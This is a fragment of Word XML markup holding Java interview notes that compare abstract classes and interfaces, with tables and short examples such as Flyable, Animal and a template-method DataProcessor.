        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19DC27B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2DED95B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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E946FD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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="5E6F4798" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7817F9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4AC7829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bstract and non-abstract (concrete) methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62EAA2A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abstract methods by default (till Java 7); Java 8+ allows default and static methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="481504A6" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E1A8B6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B61D71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variables (instance and static)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43845D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public static final (constants)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="078C057F" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6960382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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B5841C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can have constructors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E0864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constructors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="7D5E858A" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21BB998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4FC9E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supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A58025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implement multiple interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="4F05C1F3" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E35F9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67AB625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private, protected, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34E84E0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methods are public abstract by default (till Java 7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="45585FC4" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AEE609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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15FC6E7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share code among closely related classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10270E3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define a contract that multiple classes can implement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="3F08AC68" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A5EC69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Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F6116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static methods, default methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B07A3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also use static and default methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4ACADFB5"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7BC5">
          <v:rect id="_x0000_i1330" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F4F8FF"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bstract Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48012B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FDF3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6245E0D6" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCF4D1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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CCE23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leeping...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430F2BA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0B619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AC9B9"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4312E6">
          <v:rect id="_x0000_i1331" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09941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terface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30827CE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18FDDE1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 public abstract by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3DF916" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A89ADF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fuelType() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2AE1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trol/Diesel");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CD93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68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F4DF0AF"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38F5B1">
          <v:rect id="_x0000_i1332" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C175D7E"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an You Combine Them?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A5E4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 class can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE8EEC"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 one abstract class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ADCD21"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 multiple interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A312D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Base implements Vehicle, Electric {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221700F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 interface methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678C4D3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C7C58D2"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6761F">
          <v:rect id="_x0000_i1333" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="196833E1"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5995"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="20CA6A06" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D9AEC1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abstract class when:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B5F444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face when:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="674F2798" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10523E0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base class behavior/code sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E2332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multiple inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="0938E599" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62AED2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methods have default logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67DFA13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a contract to be followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="1CFBEE49" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66CCC28C"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expect future expansion of logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="585055E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must implement the same functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C51625F" w14:textId="458830FF"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A0AA5D2">
          <v:rect id="_x0000_i1334" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1B6DE" w14:textId="77777777" w:rsidR="00273F1F" w:rsidRPr="00CE4B95" w:rsidRDefault="00273F1F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc197867333"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where will you use interface and abstract class with real time examples?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="1EFF0337" w14:textId="60BF384B" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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question! Let's explore </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when to use an interface vs an abstract class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with real-world examples you can relate to — especially useful in interviews. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382B1BA3"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B56138">
          <v:rect id="_x0000_i1335" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0211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Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139175C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en:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F01CB"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for behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4A7AF"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should implement it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52319D5E"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ultiple inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F1336"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interface Flyable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4440E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lyable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D09A4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fly();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA678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B21D366" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB7BC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rd implements Flyable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C69F0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8CF185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rd is flying");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4E0A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8B188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3791F6" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE74B5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irplane implements Flyable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341C1DD"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CB707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irplane is flying");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B8551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3F63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2A818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re, Bird and Airplane are unrelated but both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can fly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — so we define the behavior via an interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B85CE0"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5F964E">
          <v:rect id="_x0000_i1336" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD00418"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Java Collections API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639FD5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p w14:paraId="19B8A66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lt;Integer&gt; set = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3C4C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ist, Set, Map ar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e can switch between implementations like ArrayList, LinkedList, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66311BEC"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161CEE">
          <v:rect id="_x0000_i1337" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="050922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Abstract Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A89B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xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20242E1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rovide some common code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270850EB"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artially implement behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0514FBD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Classes are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>closely related</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (inheritance hierarchy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D86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abstract class Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA16D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B4ABC7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2D2D58A8" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAEF1A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57A997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3B5D803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0C4A4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8A0AD1" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69CDADE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29600D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FAB043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7ECE3A4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D9BE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72505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 animals eat (common method), but each makes a different sound — abstract class handles shared logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79821E7B"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0B433">
          <v:rect id="_x0000_i1338" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD849F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Template Method Design Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799AD1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frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, base abstract classes define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and subclasses override specific parts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9245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DataProcessor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91E85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readData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A6D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processData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7891EE2F" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116B6EC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6185526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Data();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B74DA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cessData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D29D7E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4C9E8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6A39D7"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DC4EC">
          <v:rect id="_x0000_i1339" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539F207"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1350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="1A2626B4" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B06D960"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enario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20CE01C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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="083E3482" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44A775D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classes sharing the same behavior (e.g., Flyable, Serializable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6760D0F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tc>
      </w:tr>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="58C439CC" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55711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ed classes with common implementation (e.g., Animal, Shape)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E26923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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AEA1DA6"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A854A5">
          <v:rect id="_x0000_i1340" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="028061A5"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54"/>
        <w:gridCol w:w="1350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="48F082CA" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="122E9FA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21AEAF2C"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582E0A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r>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="30AC2489" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
